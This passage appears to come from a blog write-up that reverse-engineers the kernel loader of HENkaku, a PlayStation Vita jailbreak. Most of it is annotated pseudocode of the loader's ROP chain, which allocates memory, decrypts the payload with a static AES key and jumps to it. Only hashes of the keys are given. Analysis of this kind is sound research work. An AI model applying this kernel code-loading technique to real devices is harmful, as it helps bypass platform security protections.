r7 = scesysmem_base + 0xA521
0x0F(sp) = 0
r11 = payload_addr
r6 = scesysmem_base + 0x1F00
r9 = scesysmem_base + 0x23000
r10 = scesysmem_base + 0x1BA00
r1 = 0x1020D006
r2 = 0xB000
r3 = 0
r0 = sp + 0x18
// Allocate memblock1
r0 = kern_memblock_alloc(sp + 0x18, 0x1020D006, 0xB000, 0);
r2 = 0xB000
r3 = 0
0x04(sp) = r0 // memblock1_id
r0 = sp + 0x18
r1 = 0x1020D005
r6 = scesysmem_base + 0x1F15 // sub_A61F14
// Allocate memblock2
r0 = kern_memblock_alloc(sp + 0x18, 0x1020D005, 0xB000, 0);
r12 = 0x04(sp) // memblock1_id
r7 = r0 // memblock2_id
r1 = sp + 0x10
r9 = scesysmem_base + 0x23095
r10 = scesysmem_base + 0x1BAF5
r0 = memblock1_id
// Get memblock1's address
r0 = kern_memblock_getaddr(memblock1_id, sp + 0x10);
r0 = memblock2_id
r1 = sp + 0x14
// Get memblock2's address
r0 = kern_memblock_getaddr(memblock2_id, sp + 0x14);
r3 = scesysmem_base + 0x8200
r0 = 0x10(sp) // memblock1_addr
r3 = scesysmem_base + 0x825D
r1 = payload_addr
r2 = 0xA000
r7 = scesysmem_base + 0x1D800
// Call copy_from_user to read the HENkaku's payload
// into our new memory block
copy_from_user(memblock1_addr, payload_addr, 0xA000);
r6 = 0x10(sp) // memblock1_addr
r1 = 0x80
r3 = 0x40
r7 = scesysmem_base + 0x1D8D9
r2 = 0x80
r6 = memblock1_addr + 0xA000
r0 = memblock1_addr + 0xA000
r3 = payload_key
// Set the HENkaku's payload key (AES-128-ECB)
AES_setkey(memblock1_addr + 0xA000, 0x80, 0x80, payload_key, 0);
while (r4 != 0xA000)
r1 = 0x10(sp) // memblock1_addr
r0 = memblock1_addr + 0xA000
r1 = memblock1_addr + r4
r4 = r4 + 0x10
r2 = memblock1_addr + r4
// Decrypt the payload in place
AES_decrypt(memblock1_addr + 0xA000, memblock1_addr + r4, memblock1_addr + r4);
r0 = 0x14(sp) // memblock2_addr
r2 = 0xB000
r1 = 0x10(sp) // memblock1_addr
// Copy from data memory block to executable memory block
kern_memcpy(memblock2_addr, memblock1_addr, 0xB000);
r3 = 0x14(sp) // memblock2_addr
r2 = 0x10(sp) // memblock1_addr
r3 = memblock2_addr + 0x01
r2 = memblock1_addr + 0xAF00
// Set PC
r4 = memblock2_addr + 0x01 // payload()
// Set SP
sp = memblock1_addr + 0xAF00
r0 = scesysmem_base
// Call payload
sp = (sp + 0x1C)

In sum, the loader allocates two memory blocks, one for data and another for code. Then it fetches the HENkaku's payload from user memory (using copy_from_user) and decrypts it in place using a static key (stored inside the kernel loader binary data). Finally, it copies the decrypted payload into an executable memory block, set's PC and SP and jumps to it.

Now we have HENkaku running on our system!
As proof, here are the SHA-1 hashes of the two crucial keys for the entire process:
Kernel loader key (AES-256-ECB): f1a8e9415bf3551377a36a1a5b25ba64f2d96494
Kernel payload key (AES-128-ECB): eacac4a780065c8c106349e412696aabd1b1b8d1

And that's it! This concludes the final stage of the HENkaku's KOTH challenge.
I don't plan on dwelving much into how I leaked the kernel's memory and I don't plan on releasing the keys themselves out of respect for other groups attempting to complete the challenge and for the developers themselves.
I believe the goal of this challenge was not to simply crown the first person to crack HENkaku, but to get the whole community engaged and bringing new ideas to the table.
By not releasing the decrypted binaries or the method I used to leak memory, others still have the chance to solve the challenge themselves.
I may publish a few more posts detailing some interesting features of the HENkaku's payload, but I will leave the full source code reveal to the developers themselves.

Until next time!


